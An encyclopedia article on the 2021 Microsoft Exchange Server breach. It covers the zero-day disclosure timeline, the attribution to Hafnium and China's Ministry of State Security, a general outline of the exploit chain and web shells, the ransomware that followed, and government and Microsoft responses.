2021 Microsoft Exchange Server data breach

Microsoft Exchange is a widely used email server software and a frequent target for cyberattacks on business networks. According to Microsoft, its environment allows attackers to misuse built-in administrative tools or scripts for malicious purposes.{{Cite web|date=25 June 2020|title=How attackers target and exploit Microsoft Exchange servers|url=https://www.helpnetsecurity.com/2020/06/25/target-microsoft-exchange-servers/|access-date=14 March 2021|website=Help Net Security|language=en-US}} Microsoft Exchange has previously been targeted by nation-state threat actors.{{Cite web|last=Cimpanu|first=Catalin|date=9 March 2020|title=Multiple nation-state groups are hacking Microsoft Exchange servers|url=https://www.zdnet.com/article/multiple-nation-state-groups-are-hacking-microsoft-exchange-servers/|url-status=live|access-date=14 March 2021|website=ZDNet|language=en|archive-url=https://web.archive.org/web/20200309071618/https://www.zdnet.com/article/multiple-nation-state-groups-are-hacking-microsoft-exchange-servers/ |archive-date=9 March 2020 }}{{Cite web|last=Cimpanu|first=Catalin|date=7 May 2019|title=Russian cyberspies are using one hell of a clever Microsoft Exchange backdoor|url=https://www.zdnet.com/article/russian-cyberspies-are-using-one-hell-of-a-clever-microsoft-exchange-backdoor/|url-status=live|access-date=14 March 2021|website=ZDNet|language=en|archive-url=https://web.archive.org/web/20190508014609/https://www.zdnet.com/article/russian-cyberspies-are-using-one-hell-of-a-clever-microsoft-exchange-backdoor/ |archive-date=8 May 2019 }}

On 5 January 2021, security testing company DEVCORE reported the vulnerability to Microsoft, which Microsoft confirmed on 8 January.{{Cite web|last=Krebs|first=Brian|author-link=Brian Krebs|date=8 March 2021|title=A Basic Timeline of the Exchange Mass-Hack|url=https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/|url-status=live|access-date=10 March 2021|website=Krebs on Security|language=en-US|archive-url=https://web.archive.org/web/20210308161206/https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/ |archive-date=8 March 2021 }} On 6 January 2021, cybersecurity company Volexity detected the first known breach of a Microsoft Exchange Server instance.{{Cite web|last=Krebs|first=Chris|author-link=Chris Krebs|date=5 March 2021|title=At Least 30,000 U.S. Organizations Newly Hacked Via Holes in Microsoft's Email Software|url=https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/|url-status=live|access-date=10 March 2021|website=Krebs on Security|language=en-US|archive-url=https://web.archive.org/web/20210305211313/https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/ |archive-date=5 March 2021 }} By late January, Volexity detected a breach that allowed attackers to access data from two of its customers and reported the vulnerability to Microsoft. Following Microsoft's notification of the breach, Volexity reported that the hackers became less discreet in anticipation of a patch.

On 2 March 2021, cybersecurity company ESET reported observing multiple threat actors, in addition to Hafnium, exploiting the vulnerabilities. On 10 March 2021, Wired reported that following the patch, additional threat actors were likely to reverse engineer the fix to target unpatched servers. Analysts at two security firms reported observing signs that attackers were preparing to deploy cryptomining software on affected servers.{{Cite magazine|last=Newman|first=Lily Hay|date=10 March 2021|title=It's Open Season for Microsoft Exchange Server Hacks|language=en-us|magazine=Wired|url=https://www.wired.com/story/microsoft-exchange-patch-hacks-ransomware/|access-date=10 March 2021|issn=1059-1028}}

On 10 March 2021, security researcher Nguyen Jang posted proof-of-concept code to Microsoft-owned GitHub demonstrating how the exploit works, consisting of 169 lines of code. The program was intentionally written with errors, allowing security researchers to understand the exploit while preventing malicious actors from using the code to access servers. Later that day, GitHub removed the code, stating that it "contains proof-of-concept code for a recently disclosed vulnerability that is being actively exploited".{{Cite web|date=14 March 2021|title=New PoC for Microsoft Exchange bugs puts attacks in reach of anyone|url=https://www.bleepingcomputer.com/news/security/new-poc-for-microsoft-exchange-bugs-puts-attacks-in-reach-of-anyone/|url-status=live|access-date=15 March 2021|website=BleepingComputer|language=en-us|archive-url=https://web.archive.org/web/20210314194400/https://www.bleepingcomputer.com/news/security/new-poc-for-microsoft-exchange-bugs-puts-attacks-in-reach-of-anyone/ |archive-date=14 March 2021 }}{{Cite web|last=Claburn|first=Thomas|date=12 March 2021|title=Microsoft's GitHub under fire after disappearing proof-of-concept exploit for critical Microsoft Exchange vuln|url=https://www.theregister.com/2021/03/12/github_disappears_exploit/|url-status=live|access-date=15 March 2021|work=The Register|language=en|archive-url=https://web.archive.org/web/20210312003514/https://www.theregister.com/2021/03/12/github_disappears_exploit/ |archive-date=12 March 2021 }} On 13 March, another group independently published exploit code, which required minimal modification to function. The CERT Coordination Center's Will Dormann stated that the "exploit is completely out of the bag by now".{{Cite web|date=16 March 2021|title=Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix|url=https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/|url-status=live|access-date=2021-03-16|website=threatpost.com|language=en|archive-url=https://web.archive.org/web/20210316165816/https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/ |archive-date=16 March 2021 }}

The attacks came shortly after the 2020 United States federal government data breach, which also involved the compromise of Microsoft's Outlook web application and supply chain. Microsoft stated that there was no connection between the two incidents.{{Cite news|date=6 March 2021|title=Microsoft hack: White House warns of 'active threat' of email attack|language=en-GB|work=BBC News|url=https://www.bbc.com/news/world-us-canada-56304379|access-date=10 March 2021}}

{{Further|Cyberwarfare and China}}

Microsoft said that the attack was initially perpetrated by the Hafnium, a Chinese state-sponsored hacking group (advanced persistent threat) that operates out of China.{{Cite news|date=3 March 2021|title=Microsoft accuses China over email cyber-attacks|language=en-GB|work=BBC News|url=https://www.bbc.com/news/business-56261516|access-date=10 March 2021}}{{Cite news|last=Kevin|first=Collier|date=9 March 2021|title='Really messy': Why the hack of Microsoft's email system is getting worse|work=NBC News|url=https://www.nbcnews.com/tech/security/really-messy-hack-microsofts-email-system-getting-worse-rcna377}}{{Cite web|date=2 March 2021|title=HAFNIUM targeting Exchange Servers with 0-day exploits|url=https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/|access-date=10 March 2021|website=Microsoft Security|language=en-US}} Hafnium is known to install the web shell China Chopper. Microsoft identified Hafnium as "a highly skilled and sophisticated actor" that historically has mostly targeted "entities in the United States for the purpose of exfiltrating information from a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs." Announcing the hack, Microsoft stated that this was "the eighth time in the past 12 months that Microsoft has publicly disclosed nation-state groups targeting institutions critical to civil society." As of 12 March 2021, there were, in addition to Hafnium, at least nine other distinct groups exploiting the vulnerabilities, each different styles and procedures.

The Chinese government denied involvement, calling the accusations "groundless."{{Cite web|date=3 March 2021|title=Foreign Ministry Spokesperson Wang Wenbin's Regular Press Conference on March 3, 2021|url=https://www.fmprc.gov.cn/mfa_eng/xwfw_665399/s2510_665401/t1858251.shtml|url-status=live|access-date=10 March 2021|website=Ministry of Foreign Affairs of the People's Republic of China|archive-url=https://web.archive.org/web/20210303120828/https://www.fmprc.gov.cn/mfa_eng/xwfw_665399/s2510_665401/t1858251.shtml |archive-date=3 March 2021 }}

In a July 19, 2021 joint statement, the US, UK, EU, NATO, and other Western nations accused the Ministry of State Security (MSS) of perpetrating the Exchange breach, along with other cyberattacks, "attributing with a high degree of confidence that malicious cyber actors affiliated with PRC’s MSS conducted cyber espionage operations utilizing the zero-day vulnerabilities in Microsoft Exchange Server disclosed in early March 2021."{{cite news |last=Fried |first=Ina |date=July 19, 2021 |title=U.S. and key allies accuse China of Microsoft Exchange cyberattacks |url=https://www.axios.com/china-cyberattacks-nato-181e71d2-7414-45f3-9463-c8b1d46392c1.html |work=Axios |access-date=July 19, 2021}}{{cite news |last=Tucker |first=Eric |date=July 19, 2021 |title=Microsoft Exchange hack caused by China, US and allies say |url=https://apnews.com/article/microsoft-exchange-hack-biden-china-d533f5361cbc3374fdea58d3fb059f35 |work=Associated Press |access-date=July 19, 2021}}{{cite news |last2=Sanger |first2=David E. |last1=Kanno-Youngs |first1=Zolan |date=July 19, 2021 |title=U.S. Formally Accuses China of Hacking Microsoft |url=https://www.nytimes.com/2021/07/19/us/politics/microsoft-hacking-china-biden.html |work=The New York Times |access-date=July 19, 2021}}{{cite news |last=Liptak |first=Kevin |date=July 19, 2021 |title=US blames China for hacks, opening new front in cyber offensive |url=https://www.cnn.com/2021/07/19/politics/us-china-cyber-offensive/index.html |work=CNN |access-date=July 19, 2021}}

Hackers took advantage of four separate zero-day vulnerabilities to compromise Microsoft Exchange servers' Outlook Web Access (OWA),{{Cite magazine|last=Greenberg|first=Andy|author-link=Andy Greenberg|date=5 March 2021|title=Chinese Hacking Spree Hit an 'Astronomical' Number of Victims|language=en-us|magazine=Wired|url=https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/|access-date=10 March 2021|issn=1059-1028}} giving them access to victims' entire servers and networks as well as to emails and calendar invitations,{{Cite web|last=Collier|first=Kevin|date=3 March 2021|title=U.S. issues warning after Microsoft says China hacked its mail server program|url=https://www.nbcnews.com/tech/security/u-s-issues-warning-after-microsoft-says-china-hacked-its-n1259522|url-status=live|access-date=10 March 2021|website=NBC News|language=en|archive-url=https://web.archive.org/web/20210303233700/https://www.nbcnews.com/tech/security/u-s-issues-warning-after-microsoft-says-china-hacked-its-n1259522 |archive-date=3 March 2021 }} only at first requiring the address of the server, which can be directly targeted or obtained by mass-scanning for vulnerable servers; the attacker then uses two exploits, the first allowing an attacker to connect to the server and falsely authenticate as a standard user. With that, a second vulnerability can then be exploited, escalating that user access to administrator privileges.{{Cite web|title=ProxyLogon|url=https://proxylogon.com/|access-date=11 March 2021|website=ProxyLogon|language=zh-TW}}{{Cite web|title=Critical Microsoft Exchange flaw: What is CVE-2021-26855? {{!}} UpGuard|url=https://www.upguard.com/blog/cve-2021-26855|access-date=2021-03-16|website=www.upguard.com|language=en}} The final two exploits allow attackers to upload code to the server in any location they wish, that automatically runs with these administrator privileges. Attackers then typically use this to install a web shell, providing a backdoor to the compromised server,{{Cite web|date=2 March 2021|title=Microsoft says China-backed hackers are exploiting Exchange zero-days|url=https://techcrunch.com/2021/03/02/microsoft-says-china-backed-hackers-are-exploiting-exchange-zero-days/|access-date=10 March 2021|website=TechCrunch|language=en-US}} which gives hackers continued access to the server as long as both the web shell remains active and the Exchange server remains on.{{Cite web|date=8 March 2021|title=Hafnium timeline solidifies: A drizzle in February, a deluge in March|url=https://www.scmagazine.com/home/security-news/data-breach/as-hafnium-timeline-crystalizes-signs-of-new-microsoft-exchange-server-attacks-emerge/|access-date=10 March 2021|website=SC Media|language=en-US}}

Through the web shell installed by attackers, commands can be run remotely. Among the actions observed are the downloading of all emails from servers, downloading the passwords and email addresses of users as Microsoft Exchange stores these unencrypted in memory, adding users, adding further backdoors to affected systems, accessing other systems in the network that are unsusceptible to the original exploit, and installing ransomware.{{Cite web|date=2 March 2021|title=Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities {{!}} Volexity|url=https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/|url-status=live|access-date=11 March 2021|website=www.volexity.com|language=en-US|archive-url=https://web.archive.org/web/20210302212539/https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ |archive-date=2 March 2021 }} As patching the Exchange server against the exploit does not retroactively remove installed backdoors, attackers continue to have access to the server until the web shell, other backdoors and user accounts added by attackers are removed.{{Cite web|date=9 March 2021|title=30,000 U.S. organizations breached by cyber espionage group Hafnium|url=https://www.securitymagazine.com/articles/94781-000-us-organizations-breached-by-cyber-espionage-group-hafnium?v=preview|url-status=live|access-date=10 March 2021|website=Security Magazine|language=en|archive-url=https://web.archive.org/web/20210413012149/https://www.securitymagazine.com/articles/94781-000-us-organizations-breached-by-cyber-espionage-group-hafnium?v=preview |archive-date=13 April 2021 }}

On 27 and 28 February 2021, there was an automated attack, and on 2 and 3 March 2021, attackers used a script to return to the addresses to drop a web shell to enable them to return later. Referring to the week ending 7 March, CrowdStrike co-founder Dmitri Alperovitch stated: "Every possible victim that hadn't patched by mid-to-end of last week has already been hit by at least one or several actors".{{Cite web|date=9 March 2021|title=Criminal hacking groups piling on to escalating Microsoft Exchange crisis|url=https://appleinsider.com/articles/21/03/09/criminal-hacking-groups-piling-on-to-escalating-microsoft-exchange-crisis|url-status=live|access-date=11 March 2021|website=AppleInsider|language=en|archive-url=https://web.archive.org/web/20210309170013/https://appleinsider.com/articles/21/03/09/criminal-hacking-groups-piling-on-to-escalating-microsoft-exchange-crisis |archive-date=9 March 2021 }} After the patch was announced, the tactics changed when using the same chain of vulnerabilities.{{Cite web|date=6 March 2021|title=Four new hacking groups have joined an ongoing offensive against Microsoft's email servers|url=https://www.technologyreview.com/2021/03/06/1020442/four-new-hacking-groups-microsoft-email-servers/|url-status=live|access-date=10 March 2021|website=MIT Technology Review|language=en|archive-url=https://web.archive.org/web/20210306205625/https://www.technologyreview.com/2021/03/06/1020442/four-new-hacking-groups-microsoft-email-servers/ |archive-date=6 March 2021 }}

Microsoft Exchange Server versions of 2010, 2013, 2016 and 2019 were confirmed to be susceptible, although vulnerable editions are yet to be fully determined.{{Cite web|last=Hollister|first=Sean|date=8 March 2021|title=Microsoft was warned months ago — now, the Hafnium hack has grown to gigantic proportions|url=https://www.theverge.com/2021/3/8/22319934/microsoft-hafnium-hack-exchange-server-email-flaw-white-house|url-status=live|access-date=10 March 2021|website=The Verge|language=en|archive-url=https://web.archive.org/web/20210308212331/https://www.theverge.com/2021/3/8/22319934/microsoft-hafnium-hack-exchange-server-email-flaw-white-house |archive-date=8 March 2021 }} Cloud-based services Exchange Online and Office 365 are not affected.{{Cite web|last=Novet|first=Jordan|date=9 March 2021|title=Microsoft's big email hack: What happened, who did it, and why it matters|url=https://www.cnbc.com/2021/03/09/microsoft-exchange-hack-explained.html|access-date=15 March 2021|website=CNBC|language=en}}

Hackers have exploited the vulnerabilities to spy on a wide range of targets, affecting an estimated 250,000 servers.{{Cite news|last=O'Donnell|first=John|date=8 March 2021|title=European banking regulator EBA targeted in Microsoft hacking|language=en|work=Reuters|url=https://www.reuters.com/article/us-microsoft-hack-eba-idUSKBN2B01RP|access-date=10 March 2021}} Tom Burt, Microsoft's vice president for Customer Security & Trust, wrote that targets had included disease researchers, law offices, universities, defense contractors, non-governmental organizations, and think tanks.{{Cite web|last=Burt|first=Tom|date=2 March 2021|title=New nation-state cyberattacks|url=https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/|url-status=live|access-date=10 March 2021|website=Microsoft On the Issues|language=en-US|archive-url=https://web.archive.org/web/20210302211855/https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/ |archive-date=2 March 2021 }}{{Cite news|date=9 March 2021|title=Victims of Microsoft hack scramble to plug security holes|work=CBS News|url=https://www.cbsnews.com/news/microsoft-hack-victims-plug-security-holes/}}

Automatic updates are typically disabled by server administrators to avoid disruption from downtime and problems in software,{{Cite web|last=Leonhard|first=Woody|date=2017-12-11|title=It's time: Make sure Windows Auto Update is turned off|url=https://www.computerworld.com/article/3241241/its-time-make-sure-windows-auto-update-is-turned-off.html|access-date=2021-03-16|website=Computerworld|language=en}} and are by convention installed manually by server administrators after these updates are tested with the existing software and server-setup;{{Cite web|date=2005-08-01|title=Automatic Updates for Servers?|url=https://techgenix.com/automaticupdatesforservers/|access-date=2021-03-16|website=TechGenix|language=en-us}} as smaller organizations often operate under a smaller budget to do this in-house or otherwise outsource this to local IT providers without expertise in cybersecurity, this is often not done until it becomes a necessity, if ever. This means small and medium businesses, and local institutions such as schools and local governments are known to be the primary victims of the attack as they are more likely to not have received updates to patch the exploit. Rural victims are noted to be "largely on their own", as they are typically without access to IT service providers. On 11 March 2021, Check Point Research revealed that in the prior 24 hours "the number of exploitation attempts on organizations it tracks tripled every two to three hours."{{Cite web|first1=Brian|last1=Fung|first2=Alex|last2=Marquardt|title=White House warns organizations have 'hours, not days' to fix vulnerabilities as Microsoft Exchange attacks increase|url=https://www.kmov.com/white-house-warns-organizations-have-hours-not-days-to-fix-vulnerabilities-as-microsoft-exchange-attacks/article_2fb3edc0-d1bb-5578-b504-c9e38013bacf.html|access-date=13 March 2021|website=KMOV.com|language=en}}{{Cite web|date=11 March 2021|title=Exploits on Organizations Worldwide Tripled every Two Hours after Microsoft's Revelation of Four Zero-days|url=https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/|access-date=13 March 2021|website=Check Point Software|language=en-US}}

Check Point Research has observed the United States as being the most attacked country with 17% of all exploit attempts, followed by Germany with 6%, the United Kingdom and the Netherlands both at 5%, and Russia with 4% of all exploits; government/military is the most targeted sector with 23% of exploit attempts, followed by manufacturing at 15%, banking and financial services at 14%, software vendors with 7% and healthcare at 6%.{{Cite web|date=2021-03-11|title=Exploits on Organizations Worldwide Grow Tenfold after Microsoft's Revelation of Four Zero-days|url=https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/|access-date=2021-03-16|website=Check Point Software|language=en-US}}

The attack was discovered after attackers were discovered downloading all emails belonging to specific users on separate corporate Exchange servers. An undisclosed Washington think tank reported attackers sending convincing emails to contacts in a social engineering attack that encouraged recipients to click on a link. On 11 March 2021, Norway's parliament, the Storting, reported being a victim of the hack, stating that "data has been extracted."{{Cite press release|url=https://www.stortinget.no/nn/In-English/About-the-Storting/News-archive/Front-page-news/2020-2021/new-cyberattack-on-the-storting/|date=March 11, 2021|title=New cyberattack on the Storting}}

The European Banking Authority also reported that it had been targeted in the attack, later stating in a press release that the scope of impact on its systems was "limited" and that "the confidentiality of the EBA systems and data has not been compromised".{{Cite web|date=9 March 2021|title=Cyber-attack on the European Banking Authority – UPDATE 3|url=https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-3|access-date=11 March 2021|website=European Banking Authority|language=en}}

Security company ESET identified "at least 10" advanced persistent threat groups compromising IT, cybersecurity, energy, software development, public utility, real estate, telecommunications and engineering businesses, as well as Middle Eastern and South American governmental agencies. One APT group was identified deploying PowerShell downloaders, using affected servers for cryptocurrency mining.{{Cite web|date=10 March 2021|title=More hacking groups join Microsoft Exchange attack frenzy|url=https://www.bleepingcomputer.com/news/security/more-hacking-groups-join-microsoft-exchange-attack-frenzy/|url-status=live|access-date=11 March 2021|website=BleepingComputer|language=en-us|archive-url=https://web.archive.org/web/20210310144247/https://www.bleepingcomputer.com/news/security/more-hacking-groups-join-microsoft-exchange-attack-frenzy/ |archive-date=10 March 2021 }} Cybereason CEO Lior Div noted that APT group Hafnium "targeted small and medium-sized enterprises ... The assault against Microsoft Exchange is 1,000 times more devastating than the SolarWinds attack."{{Cite web|first=Lance|last=Whitney|date=8 March 2021|title=How the Microsoft Exchange hack could impact your organization|url=https://www.techrepublic.com/article/how-the-microsoft-exchange-hack-could-impact-your-organization/|url-status=live|access-date=11 March 2021|website=TechRepublic|language=en|archive-url=https://web.archive.org/web/20210309003817/https://www.techrepublic.com/article/how-the-microsoft-exchange-hack-could-impact-your-organization/ |archive-date=9 March 2021 }}

On 12 March 2021, Microsoft Security Intelligence announced "a new family of ransomware" called DearCry being deployed to the servers that had been initially infected, encrypting device contents, making servers unusable and demanding payment to recover files.{{Cite web|date=12 March 2021|title=Microsoft warns of ransomware attacks as Exchange hack escalates|url=https://www.itpro.co.uk/security/ransomware/358876/microsoft-warns-of-ransomware-attacks-as-exchange-hack-escalates|url-status=live|access-date=12 March 2021|website=IT PRO|language=en|archive-url=https://web.archive.org/web/20210312153946/https://www.itpro.co.uk/security/ransomware/358876/microsoft-warns-of-ransomware-attacks-as-exchange-hack-escalates |archive-date=12 March 2021 }} Microsoft stated: "There is no guarantee that paying the ransom will give you access to your files."{{Cite web|date=11 March 2021|title=Ransom:Win32/DoejoCrypt.A|url=https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&ThreatID=2147777392|url-status=live|access-date=12 March 2021|website=Microsoft Security Intelligence|archive-url=https://web.archive.org/web/20210312075611/https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&ThreatID=2147777392 |archive-date=12 March 2021 }}

On 18 March 2021, an affiliate of ransomware cybergang REvil claimed they had stolen unencrypted data from Taiwanese hardware and electronics corporation Acer, including an undisclosed number of devices being encrypted, with cybersecurity firm Advanced Intel linking this data breach and ransomware attack to the Microsoft Exchange exploits. Advanced Intel detected one of Acer's Microsoft Exchange servers first being targeted on 5 March 2021. REvil has demanded a $50 million U.S. dollar ransom, claiming if this is paid they would "provide a decryptor, a vulnerability report, and the deletion of stolen files", and stating that the ransom would double to $100 million U.S. dollars if not paid on 28 March 2021.{{Cite web|date=19 March 2021|title=Computer giant Acer hit by $50 million ransomware attack|url=https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/|url-status=live|access-date=2021-03-20|website=BleepingComputer|language=en-us|archive-url=https://web.archive.org/web/20210319193457/https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/ |archive-date=19 March 2021 }}

On 2 March 2021, the Microsoft Security Response Center (MSRC) publicly posted an out-of-band Common Vulnerabilities and Exposures (CVE) release, urging its clients to patch their Exchange servers to address a number of critical vulnerabilities.{{Cite web|date=2 March 2021|title=Multiple Security Updates Released for Exchange Server|url=https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855|access-date=10 March 2021|website=Microsoft Security Response Center}} On 15 March, Microsoft released a one-click PowerShell tool, The Exchange On-Premises Mitigation Tool, which installs the specific updates protecting against the threat, runs a malware scan which also detects installed web shells, and removes threats that were detected; this is recommended as a temporary mitigation measure, as it does not install other available updates.{{Cite web|date=16 March 2021|title=Microsoft tool provides automated Exchange threat mitigation|url=https://www.itnews.com.au/news/microsoft-tool-provides-automated-exchange-threat-mitigation-562211|url-status=live|access-date=16 March 2021|website=iTnews|archive-url=https://web.archive.org/web/20210316073516/https://www.itnews.com.au/news/microsoft-tool-provides-automated-exchange-threat-mitigation-562211 |archive-date=16 March 2021 }}

On 3 March 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive forcing government networks to update to a patched version of Exchange. On 8 March, CISA tweeted what NBC News described as an "unusually candid message" urging "ALL organizations across ALL sectors" to address the vulnerabilities.{{Cite tweet|user=USCERT_gov|number=1369097815901827081|title=CISA announcement}}{{Cite web|title=Remediating Microsoft Exchange Vulnerabilities|url=https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities|access-date=10 March 2021|website=Cybersecurity and Infrastructure Security Agency|archive-date=9 March 2021|archive-url=https://web.archive.org/web/20210309235213/https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities|url-status=dead}}

Other official bodies expressing concerns included the White House, Norway's National Security Authority and the Czech Republic's Office for Cyber and Information Security.{{Cite news|last=Murphy|first=Hannah|date=5 March 2021|title=White House warns of 'large number' of victims in Microsoft hack|work=Financial Times|url=https://www.ft.com/content/c9601a1a-ab3b-4059-8ca3-67b8387b6170}}{{Cite web|last=Vavra|first=Shannon|date=5 March 2021|title=Victims of Microsoft Exchange Server zero-days emerge|url=https://www.cyberscoop.com/microsoft-exchange-server-czech-republic-norway-hafnium-chinese-hackers/|url-status=live|access-date=10 March 2021|website=CyberScoop|language=en|archive-url=https://web.archive.org/web/20210305151609/https://www.cyberscoop.com/microsoft-exchange-server-czech-republic-norway-hafnium-chinese-hackers/ |archive-date=5 March 2021 }} On 7 March 2021, CNN reported that the Biden administration was expected to form a task force to address the breach;{{Cite web|last=Marquardt|first=Alex|date=6 March 2021|title=Biden administration expected to form task force to deal with Microsoft hack linked to China|url=https://www.cnn.com/2021/03/06/politics/microsoft-hack-task-force/index.html|url-status=live|access-date=10 March 2021|website=CNN|archive-url=https://web.archive.org/web/20210307001911/https://www.cnn.com/2021/03/06/politics/microsoft-hack-task-force/index.html |archive-date=7 March 2021 }} the Biden administration has invited private-sector organizations to participate in the task force and will provide them with classified information as deemed necessary. U.S. National Security Advisor Jake Sullivan stated that the U.S. is not yet in a position to attribute blame for the attacks.

In July 2021, the Biden administration, along with a coalition of Western allies, formally blamed China for the cyber attack. The administration highlighted the ongoing threat of from Chinese hackers, but did not accompany the condemnation with any form of sanctions. According to White House press secretary Jen Psaki, the administration is not ruling out future consequences for China.{{Cite web |last=Tucker |first=Eric|date=19 July 2021| title = Microsoft Exchange hack caused by China, Us and allies say|url=https://apnews.com/article/microsoft-exchange-hack-biden-china-d533f5361cbc3374fdea58d3fb059f35|url-status=live|access-date=3 September 2021|website = AP News|archive-url=https://web.archive.org/web/20210719111027/https://apnews.com/article/microsoft-exchange-hack-biden-china-d533f5361cbc3374fdea58d3fb059f35 |archive-date=19 July 2021 }}

{{div col}}

• Chinese cyberwarfare
• Chinese espionage in the United States
• Cyberwarfare in the United States
• Global surveillance disclosures (2013–present)
• List of data breaches
• 2020 United States federal government data breach{{div col end}}

{{reflist}}

{{Hacking in the 2020s}}

Category:2021 in computing

Category:Internet security

Category:Microsoft software

Category:Computer security exploits

Category:Cyberattacks

Category:Data breaches

Category:Hacking in the 2020s

Category:Software bugs